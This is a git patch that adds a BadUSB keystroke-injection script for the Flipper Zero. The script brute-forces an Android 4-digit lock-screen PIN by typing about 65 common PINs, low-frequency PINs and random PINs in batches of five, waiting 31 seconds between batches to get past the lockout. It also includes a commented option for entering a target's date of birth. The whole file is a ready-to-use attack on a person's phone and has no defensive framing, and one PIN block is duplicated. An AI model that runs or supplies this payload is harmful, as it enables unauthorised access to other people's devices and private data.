From 0c509006395005d2db87d011c7b1eee37e931e27 Mon Sep 17 00:00:00 2001
From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com>
Date: Wed, 31 Aug 2022 23:31:47 -0700
Subject: [PATCH] Android PIN attack (thanks rf-bandit!)

---
 BadUSB/Android_top65_4digit_pin_bf.txt | 449 +++++++++++++++++++++++++
 1 file changed, 449 insertions(+)
 create mode 100644 BadUSB/Android_top65_4digit_pin_bf.txt

diff --git a/BadUSB/Android_top65_4digit_pin_bf.txt b/BadUSB/Android_top65_4digit_pin_bf.txt
new file mode 100644
index 00000000..ceae6bc1
--- /dev/null
+++ b/BadUSB/Android_top65_4digit_pin_bf.txt
@@ -0,0 +1,449 @@
+REM Android Password Brute Force - 4 digit pin
+REM Every 5th attempt the retry waits to work around the 30s timeout Android implements after 5 failed login attempts
+REM Uncomment bottom of script for DOB options
+REM Average completion time of script is 12m
+REM An exhaustive wordlist is not used because A) it is not assumed device has healthy battery B) time/power constraints of healthy battery
+REM Tested on Android 4.4
+REM Author: defplex.wordpress.com
+REM Modified for Flipper Zero by rf-bandit
+REM ***USE AT OWN RISK***
+
+REM top 65 common pins
+
+DELAY 500
+STRING 1234
+ENTER
+DELAY 500
+STRING 4321 
+ENTER
+DELAY 500
+STRING 1111 
+ENTER
+DELAY 500
+STRING 2222 
+ENTER
+DELAY 500
+STRING 3333 
+ENTER
+DELAY 500
+STRING x
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 4444
+ENTER
+DELAY 500
+STRING 5555
+ENTER
+DELAY 500
+STRING 6666 
+ENTER
+DELAY 500
+STRING 7777 
+ENTER
+DELAY 500
+STRING 8888 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 9999 
+ENTER
+DELAY 500
+STRING 1212 
+ENTER
+DELAY 500
+STRING 1004 
+ENTER
+DELAY 500
+STRING 2000 
+ENTER
+DELAY 500
+STRING 6969 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1122 
+ENTER
+DELAY 500
+STRING 1313 
+ENTER
+DELAY 500
+STRING 0000 
+ENTER
+DELAY 500
+STRING 2001 
+ENTER
+DELAY 500
+STRING 1010 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 2580 
+ENTER
+DELAY 500
+STRING 1818 
+ENTER
+DELAY 500
+STRING 1230 
+ENTER
+DELAY 500
+STRING 1984 
+ENTER
+DELAY 500
+STRING 1986 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1985 
+ENTER
+DELAY 500
+STRING 1000 
+ENTER
+DELAY 500
+STRING 1231 
+ENTER
+DELAY 500
+STRING 1987 
+ENTER
+DELAY 500
+STRING 1999 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 2468 
+ENTER
+DELAY 500
+STRING 2002 
+ENTER
+DELAY 500
+STRING 2323 
+ENTER
+DELAY 500
+STRING 1123 
+ENTER
+DELAY 500
+STRING 1233 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1357 
+ENTER
+DELAY 500
+STRING 1221 
+ENTER
+DELAY 500
+STRING 1324 
+ENTER
+DELAY 500
+STRING 1988 
+ENTER
+DELAY 500
+STRING 2112 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1004 
+ENTER
+DELAY 500
+STRING 2021 
+ENTER
+DELAY 500
+STRING 5150 
+ENTER
+DELAY 500
+STRING 1024 
+ENTER
+DELAY 500
+STRING 1112 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1004 
+ENTER
+DELAY 500
+STRING 2021 
+ENTER
+DELAY 500
+STRING 5150 
+ENTER
+DELAY 500
+STRING 1024 
+ENTER
+DELAY 500
+STRING 1112 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1224 
+ENTER
+DELAY 500
+STRING 1969 
+ENTER
+DELAY 500
+STRING 1225 
+ENTER
+DELAY 500
+STRING 1235 
+ENTER
+DELAY 500
+STRING 1982 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1001 
+ENTER
+DELAY 500
+STRING 7410 
+ENTER
+DELAY 500
+STRING 1020 
+ENTER
+DELAY 500
+STRING 1223 
+ENTER
+DELAY 500
+STRING 1029 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 1515 
+ENTER
+DELAY 500
+STRING 1213 
+ENTER
+DELAY 500
+STRING 2345 
+ENTER
+DELAY 500
+STRING 2424 
+ENTER
+DELAY 500
+STRING 2525 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000
+ENTER
+
+REM Set dervived from the most commonly appearing digits over an average of 1000 most used pins (0123)
+
+ENTER
+DELAY 500
+STRING 0123 
+ENTER
+DELAY 500
+STRING 1023 
+ENTER
+DELAY 500
+STRING 1203 
+ENTER
+DELAY 500
+STRING 3210 
+ENTER
+DELAY 500
+STRING 2112 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000 
+
+DELAY 500
+STRING 2121 
+ENTER
+DELAY 500
+STRING 1320 
+ENTER
+DELAY 500
+STRING 3110 
+ENTER
+DELAY 500
+STRING 2111 
+ENTER
+DELAY 500
+STRING 0321 
+ENTER
+DELAY 500
+STRING x 
+ENTER
+DELAY 31000
+ENTER
+
+REMIncluding the 5 least used pins to factor in target having some OpSec
+
+ENTER
+DELAY 500
+STRING 8068 
+ENTER 
+DELAY 500
+STRING 8093 
+ENTER 
+DELAY 500
+STRING 6835 
+ENTER 
+DELAY 500
+STRING 9629 
+ENTER 
+DELAY 500
+STRING 7637 
+ENTER 
+DELAY 500
+STRING x 
+ENTER 
+DELAY 31000
+ENTER 
+
+REM Last ditch effort with 4 sets of randomly generated pins
+
+ENTER 
+DELAY 500
+STRING 6364 
+ENTER 
+DELAY 500
+STRING 6364 
+ENTER 
+DELAY 500
+STRING 6260 
+ENTER 
+DELAY 500
+STRING 8647 
+ENTER 
+DELAY 500
+STRING 0420 
+ENTER 
+DELAY 500
+STRING x 
+ENTER 
+DELAY 31000
+ENTER 
+
+
+ENTER 
+DELAY 500
+STRING 8880 
+ENTER 
+DELAY 500
+STRING 8631 
+ENTER 
+DELAY 500
+STRING 1121 
+ENTER 
+DELAY 500
+STRING 2996 
+ENTER 
+DELAY 500
+STRING 6685 
+ENTER 
+DELAY 500
+STRING x 
+ENTER 
+DELAY 31000
+ENTER 
+
+
+ENTER 
+DELAY 500
+STRING 9371 
+ENTER 
+DELAY 500
+STRING 3417 
+ENTER 
+DELAY 500
+STRING 9826 
+ENTER 
+DELAY 500
+STRING 2621 
+ENTER 
+DELAY 500
+STRING 8431 
+ENTER 
+DELAY 500
+STRING x 
+ENTER 
+DELAY 31000
+ENTER 
+
+
+ENTER 
+DELAY 500
+STRING 1185 
+ENTER 
+DELAY 500
+STRING 2281 
+ENTER 
+DELAY 500
+STRING 5519 
+ENTER 
+DELAY 500
+STRING 8657 
+ENTER 
+DELAY 500
+STRING 6435 
+ENTER 
+DELAY 500
+STRING x 
+ENTER 
+DELAY 31000
+ENTER 
+
+REM If DOB for target is known uncomment and replace xxxx with MMDD, DDMM or YYYY
+REM Left at end of script on purpose to keep everything in groups of 5
+
+REM DELAY 500
+REM STRING xxxx 
+ENTER 
+REM DELAY 500
+REM STRING xxxx 
+ENTER 
+REM DELAY 500
+REM STRING xxxx 
+ENTER 
+REM DELAY 500
+REM STRING x 
+